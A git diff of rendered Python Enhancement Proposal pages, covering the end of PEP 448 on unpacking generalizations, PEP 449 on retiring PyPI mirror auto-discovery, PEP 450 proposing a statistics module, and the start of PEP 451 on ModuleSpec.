Currently, if an argument is given multiple times — such as a +positional argument given both positionally and by keyword — a +TypeError is raised. This remains true for duplicate arguments +provided through multiple ** unpackings, +e.g. f(**{'x': 2}, **{'x': 3}), except that the error will be +detected at runtime.
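For example (the exact error message may vary between CPython versions):

>>> def f(x):
...     pass
>>> f(**{'x': 2}, **{'x': 3})
Traceback (most recent call last):
  ...
TypeError: f() got multiple values for keyword argument 'x'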

+

A function looks like this:

+
function(
+    argument or *args, argument or *args, ...,
+    kwargument or *args, kwargument or *args, ...,
+    kwargument or **kwargs, kwargument or **kwargs, ...
+)
+
+
+

Tuples, lists, sets and dictionaries will allow unpacking. This will +act as if the elements from unpacked items were inserted in order at +the site of unpacking, much as happens in unpacking in a function-call. +Dictionaries require ** unpacking; all the others require * unpacking.

+

The keys in a dictionary remain in a right-to-left priority order, so +{**{'a': 1}, 'a': 2, **{'a': 3}} evaluates to {'a': 3}. There +is no restriction on the number or position of unpackings.

+
+
+

Disadvantages

+

The allowable orders for arguments in a function call are more +complicated than before. The simplest explanation for the rules +may be “positional arguments precede keyword arguments and ** +unpacking; * unpacking precedes ** unpacking”.

+

Whilst *elements, = iterable causes elements to be a list, +elements = *iterable, causes elements to be a tuple. The +reason for this may confuse people unfamiliar with the construct.
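Concretely:

>>> *elements, = range(3)     # extended unpacking target: a list
>>> elements
[0, 1, 2]
>>> elements = *range(3),     # a display with unpacking: a tuple
>>> elements
(0, 1, 2)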

+

Concerns have been raised about the unexpected difference between +duplicate keys in dictionaries being allowed but duplicate keys +in function call syntax raising an error. Although this is already +the case with current syntax, this proposal might exacerbate the +issue. It remains to be seen how much of an issue this is in practice.

+
+
+

Variations

+

The PEP originally considered whether the ordering of argument types +in a function call (positional, keyword, * or **) could become +less strict. This met little support so the idea was shelved.

+

Earlier iterations of this PEP allowed unpacking operators inside +list, set, and dictionary comprehensions as a flattening operator +over iterables of containers:

+
>>> ranges = [range(i) for i in range(5)]
+>>> [*item for item in ranges]
+[0, 0, 1, 0, 1, 2, 0, 1, 2, 3]
+
+>>> {*item for item in ranges}
+{0, 1, 2, 3}
+
+
+

This was met with a mix of strong concerns about readability and mild +support. In order not to disadvantage the less controversial aspects +of the PEP, this was not accepted with the rest of the proposal.

+

Unbracketed comprehensions in function calls, such as f(x for x in it), +are already valid. These could be extended to:

+
f(*x for x in it) == f((*x for x in it))
+f(**x for x in it) == f({**x for x in it})
+
+
+

However, it wasn’t clear if this was the best behaviour or if it should unpack into the arguments of the call to f. Since this is likely to be confusing and is of only very marginal utility, it is not included in this PEP. These will instead raise a SyntaxError, and comprehensions with explicit brackets should be used.

+
+
+

Approval

+

This PEP was accepted by Guido on February 25, 2015 [1].

+
+
+

Implementation

+

An implementation for Python 3.5 can be found at Issue 2292 on the bug tracker [2]. This currently includes support for unpacking inside comprehensions, which should be removed.

+
+
+

References

+ +

[3] Discussion on Python-ideas list, + “list / array comprehensions extension”, Alexander Heger + (https://mail.python.org/pipermail/python-ideas/2011-December/013097.html)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0448.rst

+

Last modified: 2023-12-11 18:58:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0449/index.html b/pep-0449/index.html new file mode 100644 index 00000000000..ef01555607d --- /dev/null +++ b/pep-0449/index.html @@ -0,0 +1,260 @@ + + + + + + + + PEP 449 – Removal of the PyPI Mirror Auto Discovery and Naming Scheme | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 449 – Removal of the PyPI Mirror Auto Discovery and Naming Scheme

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
04-Aug-2013
+
Post-History:
+
04-Aug-2013
+
Replaces:
+
381
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP provides a path to deprecate and ultimately remove the auto discovery +of PyPI mirrors as well as the hard coded naming scheme which requires +delegating a domain name under pypi.python.org to a third party.

+
+
+

Rationale

+

The PyPI mirroring infrastructure (defined in PEP 381) provides a means to +mirror the content of PyPI used by the automatic installers. It also provides +a method for auto discovery of mirrors and a consistent naming scheme.

+

There are a number of problems with the auto discovery protocol and the +naming scheme:

+
    +
  • They give control over a *.python.org domain name to a third party, +allowing that third party to set or read cookies on the pypi.python.org and +python.org domain name.
  • +
  • The use of a sub domain of pypi.python.org means that the mirror operators will never be able to get an SSL certificate of their own, and giving them one for a python.org domain name is unlikely to happen.
  • +
  • The auto discovery uses an unauthenticated protocol (DNS).
  • +
  • The lack of a TLS certificate on these domains means that clients cannot be sure that they have not been a victim of DNS poisoning or a MITM attack.
  • +
  • The auto discovery protocol was designed to enable a client to automatically select a mirror for use. This is no longer a requirement because PyPI is now served by a CDN, a globally distributed network of servers which automatically selects a server close to the client without any effort on the client’s part.
  • +
  • The auto discovery protocol and use of the consistent naming scheme has only +ever been implemented by one installer (pip), and its implementation, besides +being insecure, has serious issues with performance and is slated for removal +with its next release (1.5).
  • +
  • While there are provisions in PEP 381 that would solve some of these issues for a dedicated client, they would not solve the issues that affect a user’s browser. Additionally, these provisions have not been implemented by any installer to date.
  • +
+

Due to the number of issues, some of them very serious, and given that the CDN provides most of the benefit of the auto discovery and consistent naming scheme, this PEP proposes to first deprecate and then remove the [a..z].pypi.python.org names for mirrors and the last.pypi.python.org name for the auto discovery protocol. The ability to mirror and the method of mirroring will not be affected and will continue to exist as written in PEP 381. Operators of existing mirrors are encouraged to acquire their own domains and certificates to use for their mirrors if they wish to continue hosting them.

+
+
+

Plan for Deprecation & Removal

+

Immediately upon acceptance of this PEP documentation on PyPI will be updated +to reflect the deprecated nature of the official public mirrors and will +direct users to external resources like http://www.pypi-mirrors.org/ to +discover unofficial public mirrors if they wish to use one.

+

Mirror operators, if they wish to continue operating their mirror, should +acquire a domain name to represent their mirror and, if they are able, a TLS +certificate. Once they have acquired a domain they should redirect their +assigned N.pypi.python.org domain name to their new domain. On Feb 15th, 2014 +the DNS entries for [a..z].pypi.python.org and last.pypi.python.org will be +removed. At any time prior to Feb 15th, 2014 a mirror operator may request +that their domain name be reclaimed by PyPI and pointed back at the master.

+
+

Why Feb 15th, 2014

+

The most critical decision of this PEP is the final cut off date. If the date +is too soon then it needlessly punishes people by forcing them to drop +everything to update their deployment scripts. If the date is too far away then +the extended period of time does not help with the migration effort and merely +puts off the migration until a later date.

+

The date of Feb 15th, 2014 has been chosen because it is roughly 6 months from the date of the PEP. This should ensure a lengthy period of time to enable people to update their deployment procedures to point to the new domain names, without merely padding the cut off date.

+
+
+

Why the DNS entries must be removed

+

While it would be possible to simply reclaim the domain names used by mirrors and direct them back at PyPI, so that users would not need to update configurations to point away from those domains, this approach has a number of issues:

+
    +
  • Anyone who currently has these names hard coded in their configuration has +them hard coded as HTTP. This means that by allowing these names to continue +resolving we make it simple for a MITM operator to attack users by rewriting +the redirect to HTTPS prior to giving it to the client.
  • +
  • The overhead of maintaining several domains pointing at PyPI has proved +troublesome for the small number of N.pypi.python.org domains that have +already been reclaimed. They oftentimes get mis-configured when things +change on the service which often leaves them broken for months at a time +until somebody notices. By leaving them in we leave users of these domains +open to random breakages which are less likely to get caught or noticed.
  • +
  • People using these domains have explicitly chosen to use them for one reason +or another. One such reason may be because they do not wish to deploy from +a host located in a particular country. If these domains continue to resolve +but do not point at their existing locations we have silently removed this +choice from the existing users of those domains.
  • +
+

That being said, removing the entries will require users who have modified their configuration to either point back at the master (PyPI) or select a new mirror name to point at. This is regarded as a regrettable requirement to protect PyPI itself and the users of the mirrors from the attacks outlined above or, at the very least, to require them to make an informed decision about the insecurity.

+
+
+
+

Public or Private Mirrors

+

The mirroring protocol will continue to exist as defined in PEP 381 and +people are encouraged to host public and private mirrors if they so desire. +The recommended mirroring client is Bandersnatch.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0449.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0450/index.html b/pep-0450/index.html new file mode 100644 index 00000000000..2e517242b0e --- /dev/null +++ b/pep-0450/index.html @@ -0,0 +1,721 @@ + + + + + + + + PEP 450 – Adding A Statistics Module To The Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 450 – Adding A Statistics Module To The Standard Library

+
+
Author:
+
Steven D’Aprano <steve at pearwood.info>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Aug-2013
+
Python-Version:
+
3.4
+
Post-History:
+
13-Sep-2013
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of a module for common statistics functions such +as mean, median, variance and standard deviation to the Python standard +library. See also http://bugs.python.org/issue18606

+
+
+

Rationale

+

The proposed statistics module is motivated by the “batteries included” +philosophy towards the Python standard library. Raymond Hettinger and other +senior developers have requested a quality statistics library that falls +somewhere in between high-end statistics libraries and ad hoc code. [1] +Statistical functions such as mean, standard deviation and others are obvious +and useful batteries, familiar to any Secondary School student. Even cheap +scientific calculators typically include multiple statistical functions such +as:

+
    +
  • mean
  • +
  • population and sample variance
  • +
  • population and sample standard deviation
  • +
  • linear regression
  • +
  • correlation coefficient
  • +
+

Graphing calculators aimed at Secondary School students typically include all +of the above, plus some or all of:

+
    +
  • median
  • +
  • mode
  • +
  • functions for calculating the probability of random variables from the +normal, t, chi-squared, and F distributions
  • +
  • inference on the mean
  • +
+

and others [2]. Likewise spreadsheet applications such as Microsoft Excel, +LibreOffice and Gnumeric include rich collections of statistical +functions [3].

+

In contrast, Python currently has no standard way to calculate even the +simplest and most obvious statistical functions such as mean. For those who +need statistical functions in Python, there are two obvious solutions:

+
    +
  • install numpy and/or scipy [4];
  • +
  • or use a Do It Yourself solution.
  • +
+

Numpy is perhaps the most full-featured solution, but it has a few +disadvantages:

+
    +
  • It may be overkill for many purposes. The documentation for numpy even warns
    +
    “It can be hard to know what functions are available in numpy. This is +not a complete list, but it does cover most of them.”[5]
    +

    and then goes on to list over 270 functions, only a small number of which are +related to statistics.

    +
  • +
  • Numpy is aimed at those doing heavy numerical work, and may be intimidating +to those who don’t have a background in computational mathematics and +computer science. For example, numpy.mean takes four arguments:
    mean(a, axis=None, dtype=None, out=None)
    +
    +
    +

    although fortunately for the beginner or casual numpy user, three are +optional and numpy.mean does the right thing in simple cases:

    +
>>> numpy.mean([1, 2, 3, 4])
    +2.5
    +
    +
    +
  • +
  • For many people, installing numpy may be difficult or impossible. For +example, people in corporate environments may have to go through a difficult, +time-consuming process before being permitted to install third-party +software. For the casual Python user, having to learn about installing +third-party packages in order to average a list of numbers is unfortunate.
  • +
+

This leads to option number 2, DIY statistics functions. At first glance, this +appears to be an attractive option, due to the apparent simplicity of common +statistical functions. For example:

+
import math
+
+def mean(data):
+    return sum(data)/len(data)
+
+def variance(data):
+    # Use the Computational Formula for Variance.
+    n = len(data)
+    ss = sum(x**2 for x in data) - (sum(data)**2)/n
+    return ss/(n-1)
+
+def standard_deviation(data):
+    return math.sqrt(variance(data))
+
+
+

The above appears to be correct with a casual test:

+
>>> data = [1, 2, 4, 5, 8]
+>>> variance(data)
+7.5
+
+
+

But adding a constant to every data point should not change the variance:

+
>>> data = [x+1e12 for x in data]
+>>> variance(data)
+0.0
+
+
+

And variance should never be negative:

+
>>> variance(data*100)
+-1239429440.1282566
+
+
+

By contrast, the proposed reference implementation gets the exactly correct +answer 7.5 for the first two examples, and a reasonably close answer for the +third: 6.012. numpy does no better [6].
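For comparison, the same checks can be run against the statistics module that eventually shipped in Python 3.4 (shown here purely as an illustration):

>>> import statistics
>>> data = [1, 2, 4, 5, 8]
>>> statistics.variance(data)
7.5
>>> statistics.variance([x + 1e12 for x in data])
7.5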

+

Even simple statistical calculations contain traps for the unwary, starting with the Computational Formula itself. Despite the name, it is numerically unstable and can be extremely inaccurate, as can be seen above. It is completely unsuitable for computation by computer [7]. This problem plagues users of many programming languages, not just Python [8], as coders reinvent the same numerically inaccurate code over and over again [9], or advise others to do so [10].

+

It isn’t just the variance and standard deviation. Even the mean is not quite +as straightforward as it might appear. The above implementation seems too +simple to have problems, but it does:

+
    +
  • The built-in sum can lose accuracy when dealing with floats of wildly +differing magnitude. Consequently, the above naive mean fails this +“torture test”:
    assert mean([1e30, 1, 3, -1e30]) == 1
    +
    +
    +

    returning 0 instead of 1, a purely computational error of 100%.

    +
  • +
  • Using math.fsum inside mean will make it more accurate with float +data, but it also has the side-effect of converting any arguments to float +even when unnecessary. E.g. we should expect the mean of a list of Fractions +to be a Fraction, not a float.
  • +
+

While the above mean implementation does not fail quite as catastrophically as +the naive variance does, a standard library function can do much better than +the DIY versions.
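Both problems described above are easy to demonstrate (a quick sketch):

>>> import math
>>> from fractions import Fraction
>>> sum([1e30, 1, 3, -1e30]) / 4        # naive mean: catastrophic cancellation
0.0
>>> math.fsum([1e30, 1, 3, -1e30]) / 4  # accurate with floats...
1.0
>>> math.fsum([Fraction(1, 2), Fraction(1, 2)])  # ...but coerces to float
1.0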

+

The example above involves an especially bad set of data, but even for more +realistic data sets accuracy is important. The first step in interpreting +variation in data (including dealing with ill-conditioned data) is often to +standardize it to a series with variance 1 (and often mean 0). This +standardization requires accurate computation of the mean and variance of the +raw series. Naive computation of mean and variance can lose precision very +quickly. Because precision bounds accuracy, it is important to use the most +precise algorithms for computing mean and variance that are practical, or the +results of standardization are themselves useless.

+
+
+

Comparison To Other Languages/Packages

+

The proposed statistics library is not intended to be a competitor to such +third-party libraries as numpy/scipy, or of proprietary full-featured +statistics packages aimed at professional statisticians such as Minitab, SAS +and Matlab. It is aimed at the level of graphing and scientific calculators.

+

Most programming languages have little or no built-in support for statistics +functions. Some exceptions:

+
+

R

+

R (and its proprietary cousin, S) is a programming language designed for +statistics work. It is extremely popular with statisticians and is extremely +feature-rich [11].

+
+
+

C#

+

The C# LINQ package includes extension methods to calculate the average of +enumerables [12].

+
+
+

Ruby

+

Ruby does not ship with a standard statistics module, despite some apparent +demand [13]. Statsample appears to be a feature-rich third-party library, +aiming to compete with R [14].

+
+
+

PHP

+

PHP has an extremely feature-rich (although mostly undocumented) set of +advanced statistical functions [15].

+
+
+

Delphi

+

Delphi includes standard statistical functions including Mean, Sum, +Variance, TotalVariance, MomentSkewKurtosis in its Math library [16].

+
+
+

GNU Scientific Library

+

The GNU Scientific Library includes standard statistical functions, +percentiles, median and others [17]. One innovation I have borrowed from the +GSL is to allow the caller to optionally specify the pre-calculated mean of +the sample (or an a priori known population mean) when calculating the variance +and standard deviation [18].

+
+
+
+

Design Decisions Of The Module

+

My intention is to start small and grow the library as needed, rather than try +to include everything from the start. Consequently, the current reference +implementation includes only a small number of functions: mean, variance, +standard deviation, median, mode. (See the reference implementation for a full +list.)

+

I have aimed for the following design features:

+
    +
  • Correctness over speed. It is easier to speed up a correct but slow function +than to correct a fast but buggy one.
  • +
  • Concentrate on data in sequences, allowing two passes over the data, rather than potentially compromise on accuracy for the sake of a one-pass algorithm. Functions expect that data will be passed as a list or other sequence; if given an iterator, they may internally convert to a list.
  • +
  • Functions should, as much as possible, honour any type of numeric data. E.g. +the mean of a list of Decimals should be a Decimal, not a float. When this is +not possible, treat float as the “lowest common data type”.
  • +
  • Although functions support data sets of floats, Decimals or Fractions, there +is no guarantee that mixed data sets will be supported. (But on the other +hand, they aren’t explicitly rejected either.)
  • +
  • Plenty of documentation, aimed at readers who understand the basic concepts +but may not know (for example) which variance they should use (population or +sample?). Mathematicians and statisticians have a terrible habit of being +inconsistent with both notation and terminology [19], and having spent many +hours making sense of the contradictory/confusing definitions in use, it is +only fair that I do my best to clarify rather than obfuscate the topic.
  • +
  • But avoid going into tedious [20] mathematical detail.
  • +
+
+
+

API

+

The initial version of the library will provide univariate (single variable) +statistics functions. The general API will be based on a functional model +function(data, ...) -> result, where data is a mandatory iterable of +(usually) numeric data.

+

The author expects that lists will be the most common data type used, but any +iterable type should be acceptable. Where necessary, functions may convert to +lists internally. Where possible, functions are expected to conserve the type +of the data values, for example, the mean of a list of Decimals should be a +Decimal rather than float.

+
+

Calculating mean, median and mode

+

The mean, median and mode functions take a single mandatory argument and return the appropriate statistic, e.g.:

+
>>> mean([1, 2, 3])
+2.0
+
+
+

Functions provided are:

+
    +
  • +
    mean(data)
    arithmetic mean of data.
    +
    +
  • +
  • +
    median(data)
    median (middle value) of data, taking the average of the two +middle values when there are an even number of values.
    +
    +
  • +
  • +
    median_high(data)
    high median of data, taking the larger of the two middle +values when the number of items is even.
    +
    +
  • +
  • +
    median_low(data)
    low median of data, taking the smaller of the two middle +values when the number of items is even.
    +
    +
  • +
  • +
    median_grouped(data, interval=1)
    50th percentile of grouped data, using interpolation.
    +
    +
  • +
  • +
    mode(data)
    most common data point.
    +
    +
  • +
+

mode is the sole exception to the rule that the data argument must be +numeric. It will also accept an iterable of nominal data, such as strings.
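For example:

>>> mode(['red', 'blue', 'blue', 'red', 'blue'])
'blue'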

+
+
+

Calculating variance and standard deviation

+

In order to be similar to scientific calculators, the statistics module will +include separate functions for population and sample variance and standard +deviation. All four functions have similar signatures, with a single mandatory +argument, an iterable of numeric data, e.g.:

+
>>> variance([1, 2, 2, 2, 3])
+0.5
+
+
+

All four functions also accept a second, optional, argument, the mean of the +data. This is modelled on a similar API provided by the GNU Scientific +Library [18]. There are three use-cases for using this argument, in no +particular order:

+
    +
  1. The value of the mean is known a priori.
  2. +
  3. You have already calculated the mean, and wish to avoid calculating +it again.
  4. +
  5. You wish to (ab)use the variance functions to calculate the second +moment about some given point other than the mean.
  6. +
+

In each case, it is the caller’s responsibility to ensure that the given argument is meaningful.
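A short sketch of use-case 2, using the proposed API:

>>> data = [1, 2, 2, 2, 3]
>>> m = mean(data)
>>> variance(data, m)   # reuses the already-computed mean
0.5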

+

Functions provided are:

+
    +
  • +
    variance(data, xbar=None)
    sample variance of data, optionally using xbar as the sample mean.
    +
    +
  • +
  • +
    stdev(data, xbar=None)
    sample standard deviation of data, optionally using xbar as the +sample mean.
    +
    +
  • +
  • +
    pvariance(data, mu=None)
    population variance of data, optionally using mu as the population +mean.
    +
    +
  • +
  • +
    pstdev(data, mu=None)
    population standard deviation of data, optionally using mu as the +population mean.
    +
    +
  • +
+
+
+

Other functions

+

There is one other public function:

+
    +
  • +
    sum(data, start=0)
    high-precision sum of numeric data.
    +
    +
  • +
+
+
+
+

Specification

+

As the proposed reference implementation is in pure Python, other Python +implementations can easily make use of the module unchanged, or adapt it as +they see fit.

+
+
+

What Should Be The Name Of The Module?

+

This will be a top-level module statistics.

+

There was some interest in turning math into a package, and making this a sub-module of math, but the general consensus eventually agreed on a top-level module. Other potential but rejected names included stats (too much risk of confusion with the existing stat module), and statslib (described as “too C-like”).

+
+
+

Discussion And Resolved Issues

+

This proposal has been previously discussed here [21].

+

A number of design issues were resolved during the discussion on Python-Ideas +and the initial code review. There was a lot of concern about the addition of +yet another sum function to the standard library, see the FAQs below for +more details. In addition, the initial implementation of sum suffered from +some rounding issues and other design problems when dealing with Decimals. +Oscar Benjamin’s assistance in resolving this was invaluable.

+

Another issue was the handling of data in the form of iterators. The first +implementation of variance silently swapped between a one- and two-pass +algorithm, depending on whether the data was in the form of an iterator or +sequence. This proved to be a design mistake, as the calculated variance could +differ slightly depending on the algorithm used, and variance etc. were +changed to internally generate a list and always use the more accurate two-pass +implementation.

+

One controversial design involved the functions to calculate median, which were +implemented as attributes on the median callable, e.g. median, +median.low, median.high etc. Although there is at least one existing +use of this style in the standard library, in unittest.mock, the code +reviewers felt that this was too unusual for the standard library. +Consequently, the design has been changed to a more traditional design of +separate functions with a pseudo-namespace naming convention, median_low, +median_high, etc.

+

Another issue that was of concern to code reviewers was the existence of a +function calculating the sample mode of continuous data, with some people +questioning the choice of algorithm, and whether it was a sufficiently common +need to be included. So it was dropped from the API, and mode now +implements only the basic schoolbook algorithm based on counting unique values.

+

Another significant point of discussion was calculating statistics of +timedelta objects. Although the statistics module will not directly +support timedelta objects, it is possible to support this use-case by +converting them to numbers first using the timedelta.total_seconds method.
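For example (a minimal sketch of the suggested conversion):

>>> from datetime import timedelta
>>> durations = [timedelta(minutes=5), timedelta(minutes=10)]
>>> mean(t.total_seconds() for t in durations)
450.0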

+
+
+

Frequently Asked Questions

+
+

Shouldn’t this module spend time on PyPI before being considered for the standard library?

+

Older versions of this module have been available on PyPI [22] since 2010. +Being much simpler than numpy, it does not require many years of external +development.

+
+
+

Does the standard library really need yet another version of sum?

+

This proved to be the most controversial part of the reference implementation. +In one sense, clearly three sums is two too many. But in another sense, yes. +The reasons why the two existing versions are unsuitable are described +here [23] but the short summary is:

+
    +
  • the built-in sum can lose precision with floats;
  • +
  • the built-in sum accepts any non-numeric data type that supports the + +operator, apart from strings and bytes;
  • +
  • math.fsum is high-precision, but coerces all arguments to float.
  • +
+

There was some interest in “fixing” one or the other of the existing sums. If +this occurs before 3.4 feature-freeze, the decision to keep statistics.sum +can be re-considered.

+
+
+

Will this module be backported to older versions of Python?

+

The module currently targets 3.3, and I will make it available on PyPI for +3.3 for the foreseeable future. Backporting to older versions of the 3.x +series is likely (but not yet decided). Backporting to 2.7 is less likely but +not ruled out.

+
+
+

Is this supposed to replace numpy?

+

No. While it is likely to grow over the years (see open issues below) it is +not aimed to replace, or even compete directly with, numpy. Numpy is a +full-featured numeric library aimed at professionals, the nuclear reactor of +numeric libraries in the Python ecosystem. This is just a battery, as in +“batteries included”, and is aimed at an intermediate level somewhere between +“use numpy” and “roll your own version”.

+
+
+
+

Future Work

+
    +
  • At this stage, I am unsure of the best API for multivariate statistical +functions such as linear regression, correlation coefficient, and covariance. +Possible APIs include:
      +
    • Separate arguments for x and y data:
      function([x0, x1, ...], [y0, y1, ...])
      +
      +
      +
    • +
    • A single argument for (x, y) data:
      function([(x0, y0), (x1, y1), ...])
      +
      +
      +

      This API is preferred by GvR [24].

      +
    • +
    • Selecting arbitrary columns from a 2D array:
      function([[a0, x0, y0, z0], [a1, x1, y1, z1], ...], x=1, y=2)
      +
      +
      +
    • +
    • Some combination of the above.
    • +
    +

    In the absence of a consensus of preferred API for multivariate stats, I will +defer including such multivariate functions until Python 3.5.

    +
  • +
  • Likewise, functions for calculating probability of random variables and +inference testing (e.g. Student’s t-test) will be deferred until 3.5.
  • +
  • There is considerable interest in including one-pass functions that can +calculate multiple statistics from data in iterator form, without having to +convert to a list. The experimental stats package on PyPI includes +co-routine versions of statistics functions. Including these will be deferred +to 3.5.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0450.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0451/index.html b/pep-0451/index.html new file mode 100644 index 00000000000..d3fb2192bb5 --- /dev/null +++ b/pep-0451/index.html @@ -0,0 +1,1086 @@ + + + + + + + + PEP 451 – A ModuleSpec Type for the Import System | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 451 – A ModuleSpec Type for the Import System

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
BDFL-Delegate:
+
Brett Cannon <brett at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Import-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Aug-2013
+
Python-Version:
+
3.4
+
Post-History:
+
08-Aug-2013, 28-Aug-2013, 18-Sep-2013, 24-Sep-2013, 04-Oct-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add a new class to importlib.machinery called +“ModuleSpec”. It will provide all the import-related information used +to load a module and will be available without needing to load the +module first. Finders will directly provide a module’s spec instead of +a loader (which they will continue to provide indirectly). The import +machinery will be adjusted to take advantage of module specs, including +using them to load modules.

+
+
+

Terms and Concepts

+

The changes in this proposal are an opportunity to make several +existing terms and concepts more clear, whereas currently they are +(unfortunately) ambiguous. New concepts are also introduced in this +proposal. Finally, it’s worth explaining a few other existing terms +with which people may not be so familiar. For the sake of context, here +is a brief summary of all three groups of terms and concepts. A more +detailed explanation of the import system is found at +[2].

+
+

name

+

In this proposal, a module’s “name” refers to its fully-qualified name, +meaning the fully-qualified name of the module’s parent (if any) joined +to the simple name of the module by a period.

+
+
+

finder

+

A “finder” is an object that identifies the loader that the import +system should use to load a module. Currently this is accomplished by +calling the finder’s find_module() method, which returns the loader.

+

Finders are strictly responsible for providing the loader, which they do +through their find_module() method. The import system then uses that +loader to load the module.

+
+
+

loader

+

A “loader” is an object that is used to load a module during import. +Currently this is done by calling the loader’s load_module() method. A +loader may also provide APIs for getting information about the modules +it can load, as well as about data from sources associated with such a +module.

+

Right now loaders (via load_module()) are responsible for certain +boilerplate, import-related operations. These are:

+
    +
  1. Perform some (module-related) validation
  2. +
  3. Create the module object
  4. +
  5. Set import-related attributes on the module
  6. +
  7. “Register” the module to sys.modules
  8. +
  9. Exec the module
  10. +
  11. Clean up in the event of failure while loading the module
  12. +
+

This all takes place during the import system’s call to +Loader.load_module().

+
+
+

origin

+

This is a new term and concept. The idea of it exists subtly in the +import system already, but this proposal makes the concept explicit.

+

“origin” in an import context means the system (or resource within a +system) from which a module originates. For the purposes of this +proposal, “origin” is also a string which identifies such a resource or +system. “origin” is applicable to all modules.

+

For example, the origin for built-in and frozen modules is the +interpreter itself. The import system already identifies this origin as +“built-in” and “frozen”, respectively. This is demonstrated in the +following module repr: “<module ‘sys’ (built-in)>”.

+

In fact, the module repr is already a relatively reliable, though +implicit, indicator of a module’s origin. Other modules also indicate +their origin through other means, as described in the entry for +“location”.

+

It is up to the loader to decide on how to interpret and use a module’s +origin, if at all.

+
+
+

location

+

This is a new term. However the concept already exists clearly in the +import system, as associated with the __file__ and __path__ +attributes of modules, as well as the name/term “path” elsewhere.

+

A “location” is a resource or “place”, rather than a system at large, +from which a module is loaded. It qualifies as an “origin”. Examples +of locations include filesystem paths and URLs. A location is +identified by the name of the resource, but may not necessarily identify +the system to which the resource pertains. In such cases the loader +would have to identify the system itself.

+

In contrast to other kinds of module origin, a location cannot be +inferred by the loader just by the module name. Instead, the loader +must be provided with a string to identify the location, usually by the +finder that generates the loader. The loader then uses this information +to locate the resource from which it will load the module. In theory +you could load the module at a given location under various names.

+

The most common example of locations in the import system are the +files from which source and extension modules are loaded. For these +modules the location is identified by the string in the __file__ +attribute. Although __file__ isn’t particularly accurate for some +modules (e.g. zipped), it is currently the only way that the import +system indicates that a module has a location.

+

A module that has a location may be called “locatable”.

+
+
+

cache

+

The import system stores compiled modules in the __pycache__ directory +as an optimization. This module cache that we use today was provided by +PEP 3147. For this proposal, the relevant API for module caching is the +__cache__ attribute of modules and the cache_from_source() function +in importlib.util. Loaders are responsible for putting modules into the +cache (and loading out of the cache). Currently the cache is only used +for compiled source modules. However, loaders may take advantage of +the module cache for other kinds of modules.

+
+
+

package

+

The concept does not change, nor does the term. However, the +distinction between modules and packages is mostly superficial. +Packages are modules. They simply have a __path__ attribute and +import may add attributes bound to submodules. The typically perceived +difference is a source of confusion. This proposal explicitly +de-emphasizes the distinction between packages and modules where it +makes sense to do so.

+
+
+
+

Motivation

+

The import system has evolved over the lifetime of Python. In late 2002 +PEP 302 introduced standardized import hooks via finders and +loaders and sys.meta_path. The importlib module, introduced +with Python 3.1, now exposes a pure Python implementation of the APIs +described by PEP 302, as well as of the full import system. It is now +much easier to understand and extend the import system. While a benefit +to the Python community, this greater accessibility also presents a +challenge.

+

As more developers come to understand and customize the import system, any weaknesses in the finder and loader APIs will be more impactful. So the sooner we can address any such weaknesses in the import system, the better…and there are a couple we hope to take care of with this proposal.

+

Firstly, any time the import system needs to save information about a +module we end up with more attributes on module objects that are +generally only meaningful to the import system. It would be nice to +have a per-module namespace in which to put future import-related +information and to pass around within the import system. Secondly, +there’s an API void between finders and loaders that causes undue +complexity when encountered. The PEP 420 (namespace packages) +implementation had to work around this. The complexity surfaced again +during recent efforts on a separate proposal. [1]

+

The finder and loader sections above detail current responsibility +of both. Notably, loaders are not required to provide any of the +functionality of their load_module() method through other methods. Thus, +though the import-related information about a module is likely available +without loading the module, it is not otherwise exposed.

+

Furthermore, the requirements associated with load_module() are +common to all loaders and mostly are implemented in exactly the same +way. This means every loader has to duplicate the same boilerplate +code. importlib.util provides some tools that help with this, but +it would be more helpful if the import system simply took charge of +these responsibilities. The trouble is that this would limit the degree +of customization that load_module() could easily continue to facilitate.

+

More importantly, while a finder could provide the information that the loader’s load_module() would need, it currently has no consistent way to get it to the loader. This is a gap between finders and loaders which this proposal aims to fill.

+

Finally, when the import system calls a finder’s find_module(), the +finder makes use of a variety of information about the module that is +useful outside the context of the method. Currently the options are +limited for persisting that per-module information past the method call, +since it only returns the loader. Popular options for this limitation +are to store the information in a module-to-info mapping somewhere on +the finder itself, or store it on the loader.

+

Unfortunately, loaders are not required to be module-specific. On top +of that, some of the useful information finders could provide is +common to all finders, so ideally the import system could take care of +those details. This is the same gap as before between finders and +loaders.

+

As an example of complexity attributable to this flaw, the +implementation of namespace packages in Python 3.3 (see PEP 420) added +FileFinder.find_loader() because there was no good way for +find_module() to provide the namespace search locations.

+

